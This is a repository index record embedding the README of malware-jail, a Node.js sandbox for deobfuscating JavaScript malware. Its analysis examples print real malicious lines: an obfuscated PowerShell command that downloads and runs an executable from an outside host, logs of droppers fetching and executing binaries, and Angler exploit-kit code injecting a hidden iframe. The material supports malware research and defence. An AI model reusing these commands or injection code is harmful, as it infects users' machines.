{"id":13800102,"url":"https://github.com/HynekPetrak/malware-jail","last_synced_at":"2025-05-13T09:31:10.483Z","repository":{"id":46750742,"uuid":"49388942","full_name":"HynekPetrak/malware-jail","owner":"HynekPetrak","description":"Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js","archived":false,"fork":false,"pushed_at":"2023-06-16T16:17:47.000Z","size":5242,"stargazers_count":460,"open_issues_count":5,"forks_count":100,"subscribers_count":46,"default_branch":"master","last_synced_at":"2024-11-18T15:01:49.495Z","etag":null,"topics":["analysis","angler","deobfuscation","javascript","malware-analysis","malware-analyzer","malware-jail","malware-research","malware-samples","payload","payload-extraction","wscript"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HynekPetrak.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-01-10T22:41:24.000Z","updated_at":"2024-10-05T12:50:24.000Z","dependencies_parsed_at":"2024-11-18T14:51:55.466Z","dependency_job_id":"c8921591-d3c9-4b34-8024-23e78fc656aa","html_url":"https://github.com/HynekPetrak/malware-jail","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fmalware-jail","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fmalware-jail/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fmalware-jail/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HynekPetrak%2Fmalware-jail/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HynekPetrak","download_url":"https://codeload.github.com/HynekPetrak/malware-jail/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253913027,"owners_count":21983244,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["analysis","angler","deobfuscation","javascript","malware-analysis","malware-analyzer","malware-jail","malware-research","malware-samples","payload","payload-extraction","wscript"],"created_at":"2024-08-04T00:01:09.316Z","updated_at":"2025-05-13T09:31:07.389Z","avatar_url":"https://github.com/HynekPetrak.png","language":"JavaScript","funding_links":[],"categories":["Tools","JavaScript","Malware"],"sub_categories":["Detecting","Dependencies"],"readme":"# malware-jail\nSandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js\n\nmalware-jail is written for [Node's 'vm' sandbox](https://nodejs.org/api/vm.html). Currently implements \nWScript (Windows Scripting Host) context [env/wscript.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/wscript.js), at least the part frequently used\nby malware. Internet browser context is partialy implemented [env/browser.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/browser.js).\n\nRuns on any operating system. Developed and tested on Linux, Node.js v6.6.0.\n\nDue to use of some ES6 features, you'll need Node.js \u003e= 6.x.\n\n\u003e See [EXAMPLES](EXAMPLES.md) for malware samples analyzed.\n\n\u003e If you have new malware samples, please submit them to [javascript-malware-collection](https://github.com/HynekPetrak/javascript-malware-collection), either via issue or pull request.\n\n## New features ##\n\n### Version 0.19 ###\n\nEnumerates WMI queries into a file: [wmis.json](https://github.com/HynekPetrak/malware-jail/blob/master/malware/20161013/out/wmis.json)\n\n### Version 0.17 ###\n\nAdded new parameter:\n\n --t404 - http requests always return HTTP/404 and throws an exception. This enables enumerating of all remote URLs.\n\n### Version 0.16 ###\n\nUrls are now saved to urls.json. See latest [EXAMPLES#malware-of-issue-14](https://github.com/HynekPetrak/malware-jail/blob/master/EXAMPLES.md#malware-of-issue-14).\n\nVarious bug fixes and improvments.\n\n### Version 0.14 ###\n\nVarious bug fixes and improvments.\n\n### Version 0.13 ###\n\nAdded new parameters:\n\n -t msecs - limits execution time by \"msecs\" miliseconds, by default 60 seconds.\n --h404 - http requests always return HTTP/404 and does not throw an exception. This enables enumerating of all remote URLs.\n\n## Installing ##\n\nYou'll need [Node.js](https://nodejs.org) and [npm](https://npmjs.org/) installed.\n\nmalware-jail is built on top of [minimist](https://www.npmjs.com/package/minimist), [iconv-lite](https://github.com/ashtuchkin/iconv-lite) \nand [entities](https://www.npmjs.com/package/entities).\n\n### Pull from GitHub ###\n\nPull the source with git:\n\n git clone https://github.com/HynekPetrak/malware-jail.git\n cd malware-jail\n\nThen install all the dependecies (minimist, entities, iconv-lite) with:\n\n npm install\n\n### NPM Package ###\n\nNot yet available, comming soon ...\n\n## Warning ##\n\n\u003e Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. \n\u003e It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine.\n\u003e Angler files in the malware folder are NOT disarmed.\n\n## Usage ##\n\n bash@linux# node jailme.js -h -b list\n 7 May 20:54:52 - malware-jail, a malware sandbox ver. 0.19\n 7 May 20:54:52 - ------------------------\n 7 May 20:54:52 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-c ./config.json] \\\n 7 May 20:54:52 - [-o ofile] [-b id] \\\n 7 May 20:54:52 - [-s odir] [--down] [malware1 [malware2] .. ]\n 7 May 20:54:52 - -c config .. use alternative config file, preceed with ./\n 7 May 20:54:52 - -e ifile ... js that simulates specific environment\n 7 May 20:54:52 - -o ofile ... name of the file where sandbox shall be dumped at the end\n 7 May 20:54:52 - -s odir ... output directory for generated files (malware payload)\n 7 May 20:54:52 - -b id ... browser type, use -b list for possible values\n 7 May 20:54:52 - -t msecs ... number of miliseconds before terminating execution, default 1 minute\n 7 May 20:54:52 - --trace ... print stack trace with every log line\n 7 May 20:54:52 - --down ... allow downloading malware payloads from remote servers\n 7 May 20:54:52 - --h404 ... on download return always HTTP/404\n 7 May 20:54:52 - malware ... js with the malware code\n 7 May 20:54:52 - If no arguments are specified the default values are taken from config.json\n 7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]\n\nIn the examples folder you may find a deactivated malware file. Run the analysis with:\n\n node jailme.js -c ./config_wscript_only.json --down=y malware/example.js\n\nInternet browser based malware you may test with\n\n node jailme.js -b IE11_W10 malware/example_browser.js\n\nAt the end of the analysis the complete sandbox context is dumped into a _'sandbox\\_dump\\_after.json'_ file.\n\nYou may want to examine following entries of _'sandbox\\_dump\\_after.json'_:\n\n* _eval\\_calls_ - array of all eval() calls arguments. Useful if eval() is used for deobfucation.\n* _wscript\\_saved\\_files_ - content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.\n* _wscript\\_urls_ - all URLs that the malware intended to GET or POST.\n* _wscript\\_objects_ - WScript or ActiveX objects created.\n\n_'sandbox\\_dump\\_after.json'_ uses [JSONPath](http://goessner.net/articles/JsonPath/), implemented by [JSON-js/cycle.js](https://github.com/douglascrockford/JSON-js), to save duplicated or cyclic references to a same object.\n\n## Sample output ##\n\n\n bash@linux# node jailme.js malware/example.js\n 11 Jan 00:06:24 - Malware sandbox ver. 0.2\n 11 Jan 00:06:24 - ------------------------\n 11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js\n 11 Jan 00:06:24 - Malware files: malware/example.js\n 11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json\n 11 Jan 00:06:24 - Output directory for generated files: output/\n 11 Jan 00:06:24 - ==\u003e Preparing Sandbox environment.\n 11 Jan 00:06:24 - =\u003e Executing: env/eval.js\n 11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.\n 11 Jan 00:06:24 - =\u003e Executing: env/wscript.js\n 11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.\n 11 Jan 00:06:24 - ==\u003e Executing malware file(s).\n 11 Jan 00:06:24 - =\u003e Executing: malware/example.js\n 11 Jan 00:06:24 - ActiveXObject(WScript.Shell)\n 11 Jan 00:06:24 - Created: WScript.Shell[1]\n 11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)\n 11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)\n 11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]\n 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)\n 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)\n 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065\u0026jndj=IT0601)\n 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y\n 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data\n 11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)\n 11 Jan 00:06:24 - Created: ADODB_Stream[3]\n 11 Jan 00:06:24 - ADODB_Stream[3].Open()\n 11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes\n 11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\\57020551.dll, 2)\n 11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\\57020551.dll, DllRegisterServer)\n 11 Jan 00:06:24 - ADODB_Stream[3].Close()\n 11 Jan 00:08:42 - ==\u003e Script execution finished, dumping sandbox environment to a file.\n 11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll\n 11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf\n 11 Jan 00:08:42 - Generated file saved\n 11 Jan 00:08:42 - Generated file saved\n 11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json\n\nIn the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf\n\n## Examples ##\n\nThe [malware](malware) folder contains real-world malware samples. Most of them downloaded from https://malwr.com. \n\nPlease see [EXAMPLES](EXAMPLES.md) for complete index of malware samples.\n\n### Example: Analysing Wileen.js ###\n\nTaking malicious script from malwr.com: [Wileen.js](https://malwr.com/analysis/NTVkZDQ4MGZkZWE4NDAyM2EwODEyMDM3MDhjMDI1MTQ/)\n\nApparently the malware does not execute if run from within a browser:\n\n\tif (typeof document == \"undefined\") {\n\nTherefore you may want to use an alternate config filem which does not load browser/DOM components:\n\n node jailme.js --down=y -c ./config_wscript_only.json malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js \n\nInteresting use of Powershell:\n \n 1 Oct 13:05:34 - =\u003e Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js\n 1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll)\n 1 Oct 13:05:34 - Created: WScript.Shell[1]\n 1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined)\n 1 Oct 13:05:34 - ==\u003e Cleaning up sandbox.\n 1 Oct 13:05:34 - ==\u003e Script execution finished, dumping sandbox environment to a file.\n 1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json\n \nLog file: [malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out](malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out)\n\n### Example: Analysing ORDER-10455.js ###\n\nTaking malicious JavaScript from malwr.com: [ORDER-10455.js](https://malwr.com/analysis/NDU1ZDA4NmY3ZGUyNDczZjg0ODU2OGZiZTMxNjA5NzE/)\n\nFirst run without interaction with remote servers:\n\n node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js\n\nyou get something like:\n \n ... \n 29 Sep 23:17:21 - Calling eval() no.: 5\n 29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP)\n 29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9]\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false)\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined)\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status = '200'\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() =\u003e 200\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() =\u003e aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)\n 29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject)\n 29 Sep 23:17:21 - Scripting.FileSystemObject[10] created.\n 29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2)\n 29 Sep 23:17:21 - ActiveXObject(ADODB.Stream)\n 29 Sep 23:17:21 - Created: ADODB_Stream[11]\n 29 Sep 23:17:21 - ADODB_Stream[11].Open()\n 29 Sep 23:17:21 - ADODB_Stream[11].Type = '1'\n 29 Sep 23:17:21 - ADODB_Stream[11].content = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'\n 29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes\n 29 Sep 23:17:21 - ADODB_Stream[11].size = '10000'\n 29 Sep 23:17:21 - ADODB_Stream[11].Position = '0'\n 29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2\\w8z05i7y2.exe, 2)\n 29 Sep 23:17:21 - ADODB_Stream[11].content.get() =\u003e aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)\n 29 Sep 23:17:21 - ADODB_Stream[11].Close()\n 29 Sep 23:17:21 - ActiveXObject(WScript.Shell)\n 29 Sep 23:17:21 - Created: WScript.Shell[12]\n 29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2\\w8z05i7y2.exe, undefined, undefined)\n 29 Sep 23:17:21 - Returning: 'undefined'\n 29 Sep 23:17:21 - ==\u003e Cleaning up sandbox.\n 29 Sep 23:17:21 - ==\u003e Script execution finished, dumping sandbox environment to a file.\n 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() =\u003e aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)\n 29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe\n 29 Sep 23:17:21 - Generated file saved\n 29 Sep 23:17:21 - The sandbox context has been saved to: sandbox_dump_after.json\n\nSeems to be a \"standard\" behaviour of deobfuscation in order to finally download an exe binary and execute it.\n\nIf we want to get the real payload, run it with '--down=y':\n\n node jailme.js --down=y malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js \u003e malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out \n \nLog file: [malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out](malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out)\n\n### Example: Analysing Norri.js ###\n\nTaking malicious JavaScript from malwr.com: [Norri.js](https://malwr.com/analysis/Mjc0ZjUyMjZhYzg4NDJlYmEwNzBkMTAxODA5NGYwZGM/)\n\nRun:\n\n node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js\n\nyou get:\n\n 30 Sep 01:02:11 - =\u003e Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js\n 30 Sep 01:02:11 - Strict mode: false\n 30 Sep 01:02:11 - Calling eval() no.: 1\n 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)\n 30 Sep 01:02:11 - Created: WScript.Shell[9]\n 30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)\n 30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)\n 30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)\n 30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() =\u003e Desktop/?eno.lnk\n 30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)\n 30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.\n 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)\n 30 Sep 01:02:11 - Created: WScript.Shell[12]\n 30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP)\n 30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]\n 30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)\n 30 Sep 01:02:11 - Created: ADODB_Stream[14]\n 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) =\u003e TemporaryFolder/\n 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() =\u003e TempFile[15]\n 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)\n 30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true\n 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false'\n 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() =\u003e false\n 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200'\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished\n 30 Sep 01:02:15 - ADODB_Stream[14].type = '1'\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() =\u003e MZ?@?!?L?!This program cannot be ... (truncated)\n 30 Sep 01:02:15 - ADODB_Stream[14].Open()\n 30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)'\n 30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes\n 30 Sep 01:02:15 - ADODB_Stream[14].size = '196608'\n 30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)\n 30 Sep 01:02:15 - ADODB_Stream[14].content.get() =\u003e MZ?@?!?L?!This program cannot be ... (truncated)\n 30 Sep 01:02:15 - ADODB_Stream[14].Close()\n 30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)\n 30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)\n 30 Sep 01:02:15 - ==\u003e Cleaning up sandbox.\n 30 Sep 01:02:15 - ==\u003e Script execution finished, dumping sandbox environment to a file.\n 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() =\u003e MZ?@?!?L?!This program cannot be ... (truncated)\n 30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]\n 30 Sep 01:02:16 - Generated file saved\n 30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json\n\nBehaviour is obvious from the log. Payload has been extracted into the output/TemporaryFolder_TempFile[15] file. \n\nLog file: [malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out](malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out)\n\n\n### Example: Analysing Angler EK ###\n\nDownload and extract Angler EK from a pcap file at [ANGLER EK SENDS CRYPTOWALL](http://www.malware-traffic-analysis.net/2015/12/21/index.html) into a [malware/angler/angler_full.html](malware/angler/angler_full.html).\n\nStrip the non Angler part and save as [malware/angler/angler_stripped.html](malware/angler/angler_stripped.html).\n\nRemove `\u003cscript\u003e` tags and convert required `\u003cdiv\u003e` tags into:\n \n document._addElementById(id, content);\n\nand save as [malware/angler/angler.js](malware/angler/angler.js).\n\nRun the analysis:\n\n node jailme.js malware/angler/angler.js\n \nEventually capture the output into [angler_output.txt](malware/angler/angler_output.txt):\n\n node jailme.js malware/angler/angler.js \u003e malware/angler/angler_output.txt\n\nDeobfuscating the final stage:\n\n function() {\n if (document.body != null \u0026\u0026 typeof document.body != \"undefined\") {\n clearInterval(zfxhYOGvfrlHUNJrZufQnWPtohkYAQEEdV);\n if (typeof window[\"v_bcd50d9482665cd4e129a272c76799e6\"] == \"undefined\") {\n window[\"v_bcd50d9482665cd4e129a272c76799e6\"] = 1;\n var YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr = (DfPJmMLOnxPanSoeHQuOrDdSoCPJGAaRhYURtgyUD() \u0026\u0026 CCtJDLZQbieboJvsIyatBMZhUvTpzaQcyCXR());\n var YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW = !YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr \u0026\u0026 !!window.chrome \u0026\u0026 window.navigator.vendor === \"Google Inc.\";\n var rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia = -1;\n var NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS = \"http://beladonna33.ga/052F\";\n if (hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW() \u0026\u0026 rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia == 1) {\n if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {\n location.replace(NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS)\n } else {\n window.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS;\n document.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS\n }\n } else {\n if ((YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr \u0026\u0026 !YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW \u0026\u0026 !hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW())) {\n var blDiNORLBvDHjFRqgxXSMVgnfhriGmw = \"\u003cdiv style=\\\"position:absolute;left:-2808px;\\\"\u003e\u003ciframe width=\\\"27px\\\" src=\\\"\" + NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS + \"\\\" height=\\\"27px\\\"\u003e\u003c/iframe\u003e\u003c/div\u003e\";\n var wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL = document.getElementsByTagName(\"div\");\n if (wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length == 0) {\n document.body.innerHTML = document.body.innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw\n } else {\n var dl_name = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length;\n var eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc = Math.floor((dl_name / 2));\n wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw\n }\n }\n }\n }\n OncYaaSjwrEWhyHWevaHtkypMUSZxnIrtIK()\n }\n }\n\n\n## License ##\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Hynek Petrak\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fmalware-jail","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FHynekPetrak%2Fmalware-jail","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHynekPetrak%2Fmalware-jail/lists"}